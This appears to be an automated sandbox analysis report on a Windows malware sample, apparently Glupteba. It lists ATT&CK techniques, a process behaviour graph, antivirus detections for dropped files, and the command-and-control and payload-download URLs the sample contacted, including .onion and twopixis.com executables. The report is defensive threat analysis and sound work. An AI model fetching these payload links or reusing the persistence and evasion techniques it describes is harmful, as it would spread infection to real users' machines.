        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR

        ATT&CK matrix by tactic (the counts shown next to techniques in the original matrix are given in parentheses):

        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
        Execution: Windows Management Instrumentation (21); Command and Scripting Interpreter (2); Scheduled Task/Job (1); Service Execution (1); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
        Persistence: DLL Side-Loading (1); Windows Service (2); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (11); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
        Privilege Escalation: DLL Side-Loading (1); Windows Service (2); Process Injection (11); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (11); Rc.common; Startup Items; Scheduled Task/Job
        Defense Evasion: Disable or Modify Tools (2); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1); File Deletion (1); Masquerading (331); Virtualization/Sandbox Evasion (41); Process Injection (11)
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
        Discovery: File and Directory Discovery (1); System Information Discovery (14); Security Software Discovery (241); Process Discovery (1); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); Network Sniffing; Network Service Scanning
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
        Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
        Command and Control: Ingress Tool Transfer (3); Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (4); Application Layer Protocol (15); Proxy (1); Commonly Used Port; Application Layer Protocol
        Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
        Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
        Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        Behavior Graph (node id, label, edge from parent node; root node is 2):
        2 Behavior Graph ID: 877005 Sample: kdsyitkxmS.exe Startdate: 28/05/2023 Architecture: WINDOWS Score: 100
        117 stun.stunprotocol.org 2->117
        119 server5.duniadekho.bar 2->119
        121 7 other IPs or domains 2->121
        139 Snort IDS alert for network traffic 2->139
        141 Antivirus detection for URL or domain 2->141
        143 Antivirus detection for dropped file 2->143
        149 7 other signatures 2->149
        12 kdsyitkxmS.exe 13 2->12 started
        15 csrss.exe 2->15 started
        17 csrss.exe 2 2->17 started
        19 4 other processes 2->19
        145 Performs DNS TXT record lookups 117->145
        147 Uses STUN server to do NAT traversial 119->147
        171 Detected unpacking (changes PE section rights) 12->171
        173 Modifies the windows firewall 12->173
        175 Drops PE files with benign system names 12->175
        22 kdsyitkxmS.exe 1 2 12->22 started
        26 powershell.exe 24 12->26 started
        28 cmd.exe 15->28 started
        30 cmd.exe 2 17->30 started
        123 51.159.136.111 OnlineSASFR France 19->123
        125 62.210.99.238 OnlineSASFR France 19->125
        127 3 other IPs or domains 19->127
        32 csrss.exe 19->32 started
        34 powershell.exe 19->34 started
        115 C:\Windows\rss\csrss.exe, PE32 22->115 dropped
        163 Creates an autostart registry key pointing to binary in C:\Windows 22->163
        36 csrss.exe 7 27 22->36 started
        41 cmd.exe 1 22->41 started
        51 3 other processes 22->51
        43 conhost.exe 26->43 started
        45 fodhelper.exe 28->45 started
        53 3 other processes 28->53
        55 4 other processes 30->55
        47 powershell.exe 32->47 started
        49 conhost.exe 34->49 started
        129 server5.duniadekho.bar 185.82.216.50 ITL-BG Bulgaria 36->129
        131 stun4.l.google.com 74.125.204.127 GOOGLEUS United States 36->131
        133 6 other IPs or domains 36->133
        107 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 36->107 dropped
        109 C:\Users\user\AppData\Local\Temp\...\tor.exe, PE32 36->109 dropped
        111 C:\Users\user\AppData\...\tor-gencert.exe, PE32 36->111 dropped
        113 16 other files (10 malicious) 36->113 dropped
        151 Multi AV Scanner detection for dropped file 36->151
        153 Detected unpacking (changes PE section rights) 36->153
        155 Uses shutdown.exe to shutdown or reboot the system 36->155
        157 Uses schtasks.exe or at.exe to add and modify task schedules 36->157
        57 injector.exe 36->57 started
        60 cmd.exe 36->60 started
        72 13 other processes 36->72
        159 Uses netsh to modify the Windows network and firewall settings 41->159
        62 netsh.exe 2 41->62 started
        64 conhost.exe 41->64 started
        161 Drops executables to the windows directory (C:\Windows) and starts them 45->161
        66 csrss.exe 45->66 started
        68 conhost.exe 47->68 started
        75 3 other processes 51->75
        70 csrss.exe 55->70 started
        165 Antivirus detection for dropped file 57->165
        167 Multi AV Scanner detection for dropped file 57->167
        77 conhost.exe 57->77 started
        91 2 other processes 60->91
        169 Creates files in the system32 config directory 62->169
        79 csrss.exe 66->79 started
        81 powershell.exe 66->81 started
        83 csrss.exe 70->83 started
        85 powershell.exe 70->85 started
        135 77.111.247.137 HERNLABSNL Norway 72->135
        137 api.sec-tunnel.com 77.111.247.15 HERNLABSNL Norway 72->137
        87 conhost.exe 72->87 started
        89 conhost.exe 72->89 started
        93 11 other processes 72->93
        95 powershell.exe 79->95 started
        97 conhost.exe 81->97 started
        99 powershell.exe 83->99 started
        101 conhost.exe 85->101 started
        103 conhost.exe 95->103 started
        105 conhost.exe 99->105 started

        Source | Detection | Scanner | Label | Link
        kdsyitkxmS.exe | 32% | Virustotal | | Browse
        kdsyitkxmS.exe | 32% | ReversingLabs | |
        kdsyitkxmS.exe | 100% | Joe Sandbox ML | |

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | 100% | Avira | TR/Agent.twerk |
        C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll | 100% | Avira | TR/Redcap.gsjan |
        B:\EFI\Boot\old.efi (copy) | 0% | ReversingLabs | |
        B:\EFI\Microsoft\Boot\fw.efi (copy) | 0% | ReversingLabs | |
        C:\EFI\Boot\EfiGuardDxe.efi | 0% | ReversingLabs | |
        C:\EFI\Boot\bootx64.efi | 0% | ReversingLabs | |
        C:\EFI\Microsoft\Boot\bootmgfw.efi | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll | 88% | ReversingLabs | Win64.Trojan.Gluphook |
        C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | 92% | ReversingLabs | Win64.Trojan.GluptebaDrop |
        C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe | 2% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_core-2-1-7.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_extra-2-1-7.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libgcc_s_dw2-1.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssl-1_1.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libwinpthread-1.dll | 4% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor-gencert.exe | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\zlib1.dll | 0% | ReversingLabs | |
        C:\Windows\rss\csrss.exe | 32% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        http://invalidlog.txtlookup | 0% | Avira URL Cloud | safe |
        https://duniadekho.barSETCONF | 0% | Avira URL Cloud | safe |
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZ | 100% | Avira URL Cloud | malware |
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d | 100% | Avira URL Cloud | malware |
        https://server5.duniadekho.bararch=64-bit&build_number=19042&Intel%28R%29 | 0% | Avira URL Cloud | safe |
        https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031e | 100% | Avira URL Cloud | malware |
        https://github.comW | 0% | Avira URL Cloud | safe |
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233b | 0% | Avira URL Cloud | safe |
        https://duniadekho.bar | 100% | Avira URL Cloud | malware |
        http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC: | 0% | Avira URL Cloud | safe |
        https://server5.duniadekho.bar/api/restriction-usH2 | 100% | Avira URL Cloud | malware |
        http://devlog.gregarius.net/docs/ua)Links | 0% | Avira URL Cloud | safe |
        https://twopixis.com/w/w-8-debug.exe | 100% | Avira URL Cloud | malware |
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll | 100% | Avira URL Cloud | malware |
        https://twopixis.com/watchdog | 100% | Avira URL Cloud | malware |
        https://twopixis.com/watchdog/watchdog.exe | 100% | Avira URL Cloud | malware |
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNP | 100% | Avira URL Cloud | malware |
        https://server5.duniadekho.bar/api/poll | 100% | Avira URL Cloud | malware |
        https://twopixis.com/wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exe | 100% | Avira URL Cloud | malware |
        https://server5.duniadekho.bar/api/restriction-us | 100% | Avira URL Cloud | malware |
        https://twopixis.com/smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exe | 100% | Avira URL Cloud | malware |
        https://api.sec-tunnel.com/v4/subscriber_logininconsistent | 0% | Avira URL Cloud | safe |
        https://twopixis.com/gm-305-7507ffc9a340f774985cb5ca11ca78c4.exe | 100% | Avira URL Cloud | malware |
        http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion | 100% | Avira URL Cloud | malware |
        https://api.sec-tunnel.com/v4/discoverhttps://api.sec-tunnel.com/v4/geo_listindex | 0% | Avira URL Cloud | safe |
        https://twopixis.com/watchdog/watchdog.exeSETCONF | 100% | Avira URL Cloud | malware |
        https://duniadekho.barhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionCommonPro | 0% | Avira URL Cloud | safe |
        https://duniadekho.barMicrosoft | 0% | Avira URL Cloud | safe |
        https://objects.githubusercontent.com/github-production-release-asset-2e65be/350494541/0257ea00-a853 | 0% | Avira URL Cloud | safe |
        https://api.sec-tunnel.com/v4/register_subscriber | 0% | Avira URL Cloud | safe |
        https://api.sec-tunnel.com/v4/register_device | 0% | Avira URL Cloud | safe |
        https://1.1.1.1/dns-query | 0% | Avira URL Cloud | safe |
        http://https://_bad_pdb_file.pdb | 0% | Avira URL Cloud | safe |
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4 | 0% | Avira URL Cloud | safe |
        https://server5.duniadekho.bar | 100% | Avira URL Cloud | malware |
        https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581 | 100% | Avira URL Cloud | malware |
        https://api.sec-tunnel.com/v4/device_generate_passwordinternal | 0% | Avira URL Cloud | safe |
        https://blockchain.infoindex | 0% | Avira URL Cloud | safe |
        https://server5.duniadekho.bar/api/signature/ | 100% | Avira URL Cloud | malware |
        https://api.sec-tunnel.com/v4/discover | 0% | Avira URL Cloud | safe |
        http://www.avantbrowser.com)MOT-V9mm/00.62 | 0% | Avira URL Cloud | safe |
        https://server5.duniadekho.barH | 0% | Avira URL Cloud | safe |
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion | 100% | Avira URL Cloud | malware |
        http://www.xmlspy.com) | 0% | Avira URL Cloud | safe |
        https://twopixis.com/watchdog/watchdog.exeno-store | 100% | Avira URL Cloud | malware |
        http://localhost:3433/https://duniadekho.baridna: | 0% | Avira URL Cloud | safe |
        https://duniadekho.barTransfer-Encodingtworkpoll | 0% | Avira URL Cloud | safe |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        stun4.l.google.com | 74.125.204.127 | true | false | | high
        twopixis.com | 172.67.168.112 | true | false | | high
        server5.duniadekho.bar | 185.82.216.50 | true | false | | high
        github.com | 140.82.121.3 | true | false | | high
        stun.stunprotocol.org | 127.0.0.1 | true | false | | high
        cdn.discordapp.com | 162.159.134.233 | true | false | | high
        api.sec-tunnel.com | 77.111.247.15 | true | false | | high
        objects.githubusercontent.com | 185.199.110.133 | true | false | | high
        ec87b504-92ea-4d22-a937-161700799581.uuid.duniadekho.bar | unknown | unknown | false | | high
        Name | Malicious | Antivirus Detection | Reputation
        https://cdn.discordapp.com/attachments/1087398815188910163/1087399133926674453/LZ.zip | false | | high
        https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031e | true | Avira URL Cloud: malware | unknown
        https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exe | false | | high
        https://twopixis.com/w/w-8-debug.exe | false | Avira URL Cloud: malware | unknown
        https://twopixis.com/watchdog/watchdog.exe | false | Avira URL Cloud: malware | unknown
        https://server5.duniadekho.bar/api/poll | true | Avira URL Cloud: malware | unknown
        https://twopixis.com/wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exe | false | Avira URL Cloud: malware | unknown
        https://server5.duniadekho.bar/api/restriction-us | true | Avira URL Cloud: malware | unknown
        https://twopixis.com/smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exe | false | Avira URL Cloud: malware | unknown
        https://twopixis.com/gm-305-7507ffc9a340f774985cb5ca11ca78c4.exe | false | Avira URL Cloud: malware | unknown
        https://api.sec-tunnel.com/v4/register_subscriber | false | Avira URL Cloud: safe | unknown
        https://api.sec-tunnel.com/v4/register_device | false | Avira URL Cloud: safe | unknown
        https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581 | true | Avira URL Cloud: malware | unknown
        https://api.sec-tunnel.com/v4/discover | false | Avira URL Cloud: safe | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d | csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
        https://github.com | csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmp | false | | high
        https://duniadekho.barSETCONF | csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://invalidlog.txtlookup | kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZ | csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
        https://server5.duniadekho.bararch=64-bit&build_number=19042&Intel%28R%29 | csrss.exe, 00000014.00000003.210659083983.000000000C7FC000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
        https://github.comW | csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233b | csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
        https://duniadekho.bar | csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
        http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC: | csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
        https://server5.duniadekho.bar/api/restriction-usH2 | csrss.exe, 00000014.00000003.210659966591.000000000C7BE000.00000004.00001000.00020000.00000000.sdmp | false
                                • Avira URL Cloud: malware
                                unknown
                                http://devlog.gregarius.net/docs/ua)LinkskdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollcsrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://github.com/ameshkov/dnslookup/csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210616640622.000000000D764000.00000004.00001000.00020000.00000000.sdmpfalse
                                  high
                                  https://twopixis.com/watchdogcsrss.exe, 00000014.00000003.213017406273.000000000C52C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210668268821.000000000C5AC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209403091208.000000000C5C4000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213015280823.000000000C5AC000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNPcsrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://turnitin.com/robot/crawlerinfo.html)cannotkdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                    high
                                    http://search.msn.com/msnbot.htm)net/http:kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      https://api.sec-tunnel.com/v4/subscriber_logininconsistentcsrss.exe, 00000014.00000003.210616758241.000000000D754000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211821043822.000000000CE0E000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000035.00000002.209188988689.00000000709CD000.00000020.00000001.01000000.00000010.sdmpfalse
                                        high
                                        http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onioncsrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://search.msn.com/msnbot.htm)msnbot/1.1kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                          high
                                          https://api.sec-tunnel.com/v4/discoverhttps://api.sec-tunnel.com/v4/geo_listindexcsrss.exe, 00000014.00000003.211821043822.000000000CE0E000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://twopixis.com/watchdog/watchdog.exeSETCONFcsrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://duniadekho.barhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionCommonProcsrss.exe, 00000014.00000003.210671361655.000000000C4E4000.00000004.00001000.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://duniadekho.barMicrosoftcsrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            https://objects.githubusercontent.com/github-production-release-asset-2e65be/350494541/0257ea00-a853csrss.exe, 00000014.00000003.210653294128.000000000C950000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210671924295.000000000C4BC000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://1.1.1.1/dns-querycsrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210616640622.000000000D764000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://https://_bad_pdb_file.pdbkdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
